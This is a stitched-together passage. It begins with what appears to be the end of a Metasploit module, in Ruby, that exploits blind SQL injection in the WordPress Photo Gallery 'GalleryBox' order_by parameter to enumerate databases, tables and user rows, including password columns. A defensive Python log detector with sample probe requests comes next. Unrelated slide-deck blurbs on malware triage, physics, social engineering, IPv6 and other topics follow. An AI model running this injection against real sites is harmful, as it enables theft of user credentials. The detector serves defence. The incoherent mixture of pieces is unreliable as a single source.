        payload << "FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS pxqq) BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 6586*"
        payload << "(SELECT 6586 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
        res = send_injected_request(payload, gallery_id)
        length = c if res.body.length == real_length
        break if !length.nil?
      end
      print_status("Schema #{i}'s name has a length of #{length}. Getting name.")

      name = ''
      1.upto(length) do |l|
        126.downto(32) do |c|
          payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(schema_name AS CHAR),0x20) FROM (SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1) AS lela),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7601*(SELECT 7601 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
          res = send_injected_request(payload, gallery_id)
          vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length
          name << (c+1).chr if res.body.length == real_length
          break if res.body.length == real_length
        end
      end
      schemas << name
      print_status("Found database #{name}")
    end

    schemas.delete('mysql')
    schemas.delete('performance_schema')
    schemas.delete('information_schema')

    schemas.each do |schema|
      num_tables = nil
      1.upto(999) do |i|
        payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]}) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 8846*(SELECT 8846 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
        res = send_injected_request(payload, gallery_id)
        num_tables = i if res.body.length == real_length
        break if num_tables
      end
      print_status("Schema #{schema} has #{num_tables} tables. Enumerating.")

      tables = []
      0.upto(num_tables - 1) do |t|
        length = nil
        0.upto(64) do |l|
          payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(table_name),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1) BETWEEN 0 AND #{l}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
          res = send_injected_request(payload, gallery_id)
          length = l if res.body.length == real_length
          break if length
        end
        print_status("Table #{t}'s name has a length of #{length}")

        name = ''
        1.upto(length) do |l|
          126.downto(32) do |c|
            payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
            res = send_injected_request(payload, gallery_id)
            name << (c+1).chr if res.body.length == real_length
            vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length
            break if res.body.length == real_length
          end
        end
        print_status("Found table #{name}")
        tables << name if name =~ /users$/
      end
      print_status("Found #{tables.length} possible user tables. Enumerating users.")

      tables.each do |table|
        table_count = ''
        char = 'a'
        i = 1
        while char
          char = nil
          58.downto(48) do |c|
            payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{schema}.#{table}),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 8335*(SELECT 8335 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
            res = send_injected_request(payload, gallery_id)
            char = (c+1).chr if res.body.length == real_length
            vprint_status("Found char #{char}") if char
            table_count << char if char
            break if char
          end
          i = i + 1
        end
        table_count = table_count.to_i
        print_status("Table #{table} has #{table_count} rows.")

        user_cols = ["ID", "user_url", "user_pass", "user_login", "user_email", "user_status", "display_name", "user_nicename", "user_registered", "user_activation_key"]

        0.upto(table_count - 1) do |t|
          user_cols.each do |col|
            i = 1
            length = '0'
            char = 'a'
            while char
              char = nil
              58.downto(48) do |c|
                payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(#{col}) AS CHAR),0x20) FROM #{schema}.#{table} ORDER BY ID LIMIT #{t},1),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7837*(SELECT 7837 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
                res = send_injected_request(payload, gallery_id)
                char = (c+1).chr if res.body.length == real_length
                vprint_status("Found char #{char}") if char
                length << char if char
                break if char
              end
              i = i + 1
            end
            length = length.to_i
            print_status("Column #{col} of row #{t} has a length of #{length}")
          end
        end
      end
    end
  end

  # Every probe is the baseline request with the payload appended to 'order_by'.
  def send_injected_request(payload, gallery_id)
    parms = get_params
    parms['gallery_id'] = gallery_id
    parms['order_by'] = 'asc ' + payload
    return send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' => parms
    })
  end
end

Source
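On the defending side, the traffic this module generates has a fixed shape: many GalleryBox requests to admin-ajax.php whose order_by value is a sort direction followed by a comma and a subquery. The detector below, an added example that is neither the module's nor the plugin's code, runs that check over constructed access-log lines; the assumption that order_by should only ever be asc or desc is mine.

```python
"""Flag blind SQL injection probes against the Photo Gallery 'GalleryBox'
action in web-server access logs.

Added example; not part of the Metasploit module or the plugin. The log
lines are constructed Apache combined-format samples, and the order_by
allow-list is an assumption about what the plugin should accept.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Sort direction is the only thing order_by should ever carry (assumption).
ALLOWED_ORDER_BY = {"asc", "desc"}
# Generic SQL tokens that have no business in a gallery sort parameter.
SQL_TOKEN_RE = re.compile(
    r"\b(SELECT|UNION|CASE\s+WHEN|INFORMATION_SCHEMA|SLEEP|BENCHMARK)\b", re.I)
# The exact shape the module above produces: a valid direction, then a
# comma-appended subquery ("asc ,(SELECT (CASE WHEN ...").
APPENDED_SUBQUERY_RE = re.compile(r"^(asc|desc)\s*,\s*\(\s*SELECT\b", re.I)

# Constructed sample: one benign gallery load, two probes from one address,
# and an unrelated request that merely mentions SELECT.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2015:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=GalleryBox&gallery_id=1&sort_by=order&order_by=asc HTTP/1.1" 200 5321 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2015:12:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=GalleryBox&gallery_id=1&sort_by=order&order_by=asc%20%2C%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%202%20END%29%29 HTTP/1.1" 200 5321 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2015:12:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=GalleryBox&gallery_id=1&sort_by=order%2C%28SELECT%201%29&order_by=asc HTTP/1.1" 200 5321 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2015:12:00:04 +0000] "GET /?s=SELECT HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""


def inspect_request(target):
    """Return [(param, reason), ...] for a suspicious GalleryBox request.

    Only admin-ajax.php requests with action=GalleryBox are examined; every
    query value is URL-decoded by parse_qs before the checks run."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("action") != ["GalleryBox"]:
        return []
    hits = []
    for name, values in params.items():
        for value in values:
            if name == "order_by" and value.lower() not in ALLOWED_ORDER_BY:
                reason = ("appended subquery" if APPENDED_SUBQUERY_RE.search(value)
                          else "order_by outside allow-list")
                hits.append((name, reason))
            elif SQL_TOKEN_RE.search(value):
                hits.append((name, "sql token in parameter"))
    return hits


def scan(log_text):
    """Parse log lines and return findings as dicts; unparsable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, reason in inspect_request(m.group("target")):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "param": param, "reason": reason})
    return findings


def offenders(findings):
    """Findings per source address: a blind probe needs hundreds of requests
    per extracted character, so a real run stands out as a burst from one IP."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for finding in found:
        print(finding)
    print(offenders(found))
```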
-
10/10!

Malware Triage: ~20% Static, ~80% Dynamic, No Assembly

Agenda:
• Static Analysis
• File Types
• Analysis Tools
• Dynamic Analysis
• Virtualization
• Application Tracing
• Analysis Tools
• Analysis Examples

Read more: https://de8fb19ad1d3d0f3ae9ca0d766a8d63ddbee9f0f.googledrive.com/host/0B_qgg13Ykpypekw4d2hwLVJmeDg/REMacMalware.pdf
-
Abstract

The S matrix of e–e scattering has the structure of a projection operator that projects incoming separable product states onto entangled two-electron states. In this projection operator the empirical value of the fine-structure constant α acts as a normalization factor. When the structure of the two-particle state space is known, a theoretical value of the normalization factor can be calculated. For an irreducible two-particle representation of the Poincaré group, the calculated normalization factor matches Wyler's semi-empirical formula for the fine-structure constant α. The empirical value of α, therefore, provides experimental evidence that the state space of two interacting electrons belongs to an irreducible two-particle representation of the Poincaré group.

Keywords: quantum electrodynamics; fine-structure constant; entanglement; gauge invariance; reverse engineering

Parts of this article were presented at the 7th International Conference On Quantum Theory and Symmetries (QTS7) in Prague 2011 [1].

Read more: http://arxiv.org/pdf/1004.0820.pdf
-
Agenda
• Definition
  – What is Social Engineering
  – Who are Social Engineers and What do They Want?
• Tactics
  – Social Engineering Threat #1
  – Social Engineering Tactics
  – Social Engineering Examples
• Prevention

Read more: http://phxsac.com/wp-content/uploads/2014/04/Social-Engineering-Auditing-the-Human-Factor.pdf
-
Social Engineering: Content
• Content:
  – What is social engineering?
  – Types of social engineering & new age threats
  – How to use Facebook to ruin someone's life
  – Countermeasures
  – Q&A

Read more: https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf
-
What is a Social Engineering Attack?
• There are three main methods used in social engineering:
  – Phishing
  – Phone elicitation
  – Onsite impersonation

What Can You Do?
• Three-step process for successfully combatting social engineering:
  – Be educated
  – Get regular check ups
  – Create critical thinking infrastructure

Read more: http://www.rsaconference.com/writable/presentations/file_upload/hum-r02-phone-more-dangerous-than-malware-v2.pdf
-
Security strategies
• Trust - who can do what
• Principle of least privilege - lock down permissions as far as possible
• Defense in depth - multi-layered protection to have fallbacks
• Software updates - rule out obvious exploits in Drupal, PHP, operating system, browser etc.

OWASP Top 10
• Open Web Application Security Project
• List of most critical security risks
• Assessment of attack vector, weakness and impact

Read more: http://klau.si/sites/default/files/Cracking-Drupal-Devdays-2014.pdf
-
Whois NerveGas
• Worked as dev-team member on many of the early jailbreaks until around iOS 4.
• Author of five iOS-related O'Reilly books including "Hacking and Securing iOS Applications"
• Designed all of the iOS forensics techniques used in law enforcement and commercial products today
• Consulted closely with federal and local law enforcement agencies and US military on high profile projects and criminal cases
• Trained law enforcement worldwide in iOS forensics and penetration arts

Read more: https://pentest.com/ios_backdoors_attack_points_surveillance_mechanisms.pdf
-
They wanted to retain the end-to-end paradigm (which got broken by NAT).
• Security was not _that_ important; L4-7 security in the network was non-existent (firewalls were usually also proxies).
• Bandwidth was _expensive_.
• Multihoming (connectivity to 2 or more ISPs) was virtually non-existent.
• They thought they could impose a worldwide hierarchical addressing scheme (like the telephone system); PI addresses were given out 15+ years after IPv6 started.
  - Which, btw, highlights another aspect: the IETF and the registries/policing orgs. are different organizations, with potentially very different agendas…

Read more: https://www.ernw.de/download/TROOPERS_IPv6SecSummit_ERNW_IPv6_Structural_Deficits.pdf
-
At Flash Summit 2010, I gave a presentation on why secure erase is important.
• Four years later, that is no longer in question.
• Instead, now the focus is on technology options for Secure Erase (SE).
• There are three categories of secure erase techniques:
  – Type-I software based secure erase
  – Type-II hardware based secure erase
  – Type-III self-destroy secure erase

Read more: http://www.flashmemorysummit.com/English/Collaterals/Proceedings/2014/20140806_203B_Winters.pdf